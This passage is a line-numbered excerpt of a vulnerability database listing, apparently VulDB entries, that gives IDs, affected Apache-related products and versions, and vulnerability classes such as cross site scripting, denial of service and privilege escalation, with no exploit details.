13389| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
13390| [73731] Apache XML Security unknown vulnerability
13391| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
13392| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
13393| [73593] Apache Traffic Server up to 5.1.0 denial of service
13394| [73511] Apache POI up to 3.10 Deadlock denial of service
13395| [73510] Apache Solr up to 4.3.0 cross site scripting
13396| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
13397| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
13398| [73173] Apache CloudStack Stack-Based unknown vulnerability
13399| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
13400| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
13401| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
13402| [72890] Apache Qpid 0.30 unknown vulnerability
13403| [72887] Apache Hive 0.13.0 File Permission privilege escalation
13404| [72878] Apache Cordova 3.5.0 cross site request forgery
13405| [72877] Apache Cordova 3.5.0 cross site request forgery
13406| [72876] Apache Cordova 3.5.0 cross site request forgery
13407| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
13408| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
13409| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
13410| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
13411| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
13412| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
13413| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
13414| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
13415| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
13416| [71629] Apache Axis2/C spoofing
13417| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
13418| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
13419| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
13420| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
13421| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
13422| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
13423| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
13424| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
13425| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
13426| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
13427| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
13428| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
13429| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
13430| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
13431| [70809] Apache POI up to 3.11 Crash denial of service
13432| [70808] Apache POI up to 3.10 unknown vulnerability
13433| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
13434| [70749] Apache Axis up to 1.4 getCN spoofing
13435| [70701] Apache Traffic Server up to 3.3.5 denial of service
13436| [70700] Apache OFBiz up to 12.04.03 cross site scripting
13437| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
13438| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
13439| [70661] Apache Subversion up to 1.6.17 denial of service
13440| [70660] Apache Subversion up to 1.6.17 spoofing
13441| [70659] Apache Subversion up to 1.6.17 spoofing
13442| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
13443| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
13444| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
13445| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
13446| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
13447| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
13448| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
13449| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
13450| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
13451| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
13452| [69846] Apache HBase up to 0.94.8 information disclosure
13453| [69783] Apache CouchDB up to 1.2.0 memory corruption
13454| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
13455| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
13456| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
13457| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
13458| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
13459| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
13460| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
13461| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
13462| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
13463| [69431] Apache Archiva up to 1.3.6 cross site scripting
13464| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
13465| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
13466| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
13467| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
13468| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
13469| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
13470| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
13471| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
13472| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
13473| [66739] Apache Camel up to 2.12.2 unknown vulnerability
13474| [66738] Apache Camel up to 2.12.2 unknown vulnerability
13475| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
13476| [66695] Apache CouchDB up to 1.2.0 cross site scripting
13477| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
13478| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
13479| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
13480| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
13481| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
13482| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
13483| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
13484| [66356] Apache Wicket up to 6.8.0 information disclosure
13485| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
13486| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
13487| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
13488| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
13489| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
13490| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
13491| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
13492| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
13493| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
13494| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
13495| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
13496| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
13497| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
13498| [65668] Apache Solr 4.0.0 Updater denial of service
13499| [65665] Apache Solr up to 4.3.0 denial of service
13500| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
13501| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
13502| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
13503| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
13504| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
13505| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
13506| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
13507| [65410] Apache Struts 2.3.15.3 cross site scripting
13508| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
13509| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
13510| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
13511| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
13512| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
13513| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
13514| [65340] Apache Shindig 2.5.0 information disclosure
13515| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
13516| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
13517| [10826] Apache Struts 2 File privilege escalation
13518| [65204] Apache Camel up to 2.10.1 unknown vulnerability
13519| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
13520| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
13521| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
13522| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
13523| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
13524| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
13525| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
13526| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
13527| [64722] Apache XML Security for C++ Heap-based memory corruption
13528| [64719] Apache XML Security for C++ Heap-based memory corruption
13529| [64718] Apache XML Security for C++ verify denial of service
13530| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
13531| [64716] Apache XML Security for C++ spoofing
13532| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
13533| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
13534| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
13535| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
13536| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
13537| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
13538| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
13539| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
13540| [64485] Apache Struts up to 2.2.3.0 privilege escalation
13541| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
13542| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
13543| [64467] Apache Geronimo 3.0 memory corruption
13544| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
13545| [64457] Apache Struts up to 2.2.3.0 cross site scripting
13546| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
13547| [9184] Apache Qpid up to 0.20 SSL misconfiguration
13548| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
13549| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
13550| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
13551| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
13552| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
13553| [8873] Apache Struts 2.3.14 privilege escalation
13554| [8872] Apache Struts 2.3.14 privilege escalation
13555| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
13556| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
13557| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
13558| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
13559| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
13560| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
13561| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
13562| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
13563| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
13564| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
13565| [64006] Apache ActiveMQ up to 5.7.0 denial of service
13566| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
13567| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
13568| [8427] Apache Tomcat Session Transaction weak authentication
13569| [63960] Apache Maven 3.0.4 Default Configuration spoofing
13570| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
13571| [63750] Apache qpid up to 0.20 checkAvailable denial of service
13572| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
13573| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
13574| [63747] Apache Rave up to 0.20 User Account information disclosure
13575| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
13576| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
13577| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
13578| [7687] Apache CXF up to 2.7.2 Token weak authentication
13579| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
13580| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
13581| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
13582| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
13583| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
13584| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
13585| [63090] Apache Tomcat up to 4.1.24 denial of service
13586| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
13587| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
13588| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
13589| [62833] Apache CXF -/2.6.0 spoofing
13590| [62832] Apache Axis2 up to 1.6.2 spoofing
13591| [62831] Apache Axis up to 1.4 Java Message Service spoofing
13592| [62830] Apache Commons-httpclient 3.0 Payments spoofing
13593| [62826] Apache Libcloud up to 0.11.0 spoofing
13594| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
13595| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
13596| [62661] Apache Axis2 unknown vulnerability
13597| [62658] Apache Axis2 unknown vulnerability
13598| [62467] Apache Qpid up to 0.17 denial of service
13599| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
13600| [6301] Apache HTTP Server mod_pagespeed cross site scripting
13601| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
13602| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
13603| [62035] Apache Struts up to 2.3.4 denial of service
13604| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
13605| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
13606| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
13607| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
13608| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
13609| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
13610| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
13611| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
13612| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
13613| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
13614| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
13615| [61229] Apache Sling up to 2.1.1 denial of service
13616| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
13617| [61094] Apache Roller up to 5.0 cross site scripting
13618| [61093] Apache Roller up to 5.0 cross site request forgery
13619| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
13620| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
13621| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
13622| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
13623| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
13624| [60708] Apache Qpid 0.12 unknown vulnerability
13625| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
13626| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
13627| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
13628| [4882] Apache Wicket up to 1.5.4 directory traversal
13629| [4881] Apache Wicket up to 1.4.19 cross site scripting
13630| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
13631| [60352] Apache Struts up to 2.2.3 memory corruption
13632| [60153] Apache Portable Runtime up to 1.4.3 denial of service
13633| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
13634| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
13635| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
13636| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
13637| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
13638| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
13639| [4571] Apache Struts up to 2.3.1.2 privilege escalation
13640| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
13641| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
13642| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
13643| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
13644| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
13645| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
13646| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
13647| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
13648| [59888] Apache Tomcat up to 6.0.6 denial of service
13649| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
13650| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
13651| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
13652| [59850] Apache Geronimo up to 2.2.1 denial of service
13653| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
13654| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
13655| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
13656| [58413] Apache Tomcat up to 6.0.10 spoofing
13657| [58381] Apache Wicket up to 1.4.17 cross site scripting
13658| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
13659| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
13660| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
13661| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
13662| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
13663| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
13664| [57568] Apache Archiva up to 1.3.4 cross site scripting
13665| [57567] Apache Archiva up to 1.3.4 cross site request forgery
13666| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
13667| [4355] Apache HTTP Server APR apr_fnmatch denial of service
13668| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
13669| [57425] Apache Struts up to 2.2.1.1 cross site scripting
13670| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
13671| [57025] Apache Tomcat up to 7.0.11 information disclosure
13672| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
13673| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
13674| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
13675| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
13676| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
13677| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
13678| [56512] Apache Continuum up to 1.4.0 cross site scripting
13679| [4285] Apache Tomcat 5.x JVM getLocale denial of service
13680| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
13681| [4283] Apache Tomcat 5.x ServletContect privilege escalation
13682| [56441] Apache Tomcat up to 7.0.6 denial of service
13683| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
13684| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
13685| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
13686| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
13687| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
13688| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
13689| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
13690| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
13691| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
13692| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
13693| [54693] Apache Traffic Server DNS Cache unknown vulnerability
13694| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
13695| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
13696| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
13697| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
13698| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
13699| [54012] Apache Tomcat up to 6.0.10 denial of service
13700| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
13701| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
13702| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
13703| [52894] Apache Tomcat up to 6.0.7 information disclosure
13704| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
13705| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
13706| [52786] Apache Open For Business Project up to 09.04 cross site scripting
13707| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
13708| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
13709| [52584] Apache CouchDB up to 0.10.1 information disclosure
13710| [51757] Apache HTTP Server 2.0.44 cross site scripting
13711| [51756] Apache HTTP Server 2.0.44 spoofing
13712| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
13713| [51690] Apache Tomcat up to 6.0 directory traversal
13714| [51689] Apache Tomcat up to 6.0 information disclosure
13715| [51688] Apache Tomcat up to 6.0 directory traversal
13716| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
13717| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
13718| [50626] Apache Solr 1.0.0 cross site scripting
13719| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
13720| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
13721| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
13722| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
13723| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
13724| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
13725| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
13726| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
13727| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
13728| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
13729| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
13730| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
13731| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
13732| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
13733| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
13734| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
13735| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
13736| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
13737| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
13738| [47214] Apachefriends xampp 1.6.8 spoofing
13739| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
13740| [47162] Apachefriends XAMPP 1.4.4 weak authentication
13741| [47065] Apache Tomcat 4.1.23 cross site scripting
13742| [46834] Apache Tomcat up to 5.5.20 cross site scripting
13743| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
13744| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
13745| [86625] Apache Struts directory traversal
13746| [44461] Apache Tomcat up to 5.5.0 information disclosure
13747| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
13748| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
13749| [43663] Apache Tomcat up to 6.0.16 directory traversal
13750| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
13751| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
13752| [43516] Apache Tomcat up to 4.1.20 directory traversal
13753| [43509] Apache Tomcat up to 6.0.13 cross site scripting
13754| [42637] Apache Tomcat up to 6.0.16 cross site scripting
13755| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
13756| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
13757| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
13758| [40924] Apache Tomcat up to 6.0.15 information disclosure
13759| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
13760| [40922] Apache Tomcat up to 6.0 information disclosure
13761| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
13762| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
13763| [40656] Apache Tomcat 5.5.20 information disclosure
13764| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
13765| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
13766| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
13767| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
13768| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
13769| [40234] Apache Tomcat up to 6.0.15 directory traversal
13770| [40221] Apache HTTP Server 2.2.6 information disclosure
13771| [40027] David Castro Apache Authcas 0.4 sql injection
13772| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
13773| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
13774| [3414] Apache Tomcat WebDAV Stored privilege escalation
13775| [39489] Apache Jakarta Slide up to 2.1 directory traversal
13776| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
13777| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
13778| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
13779| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
13780| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
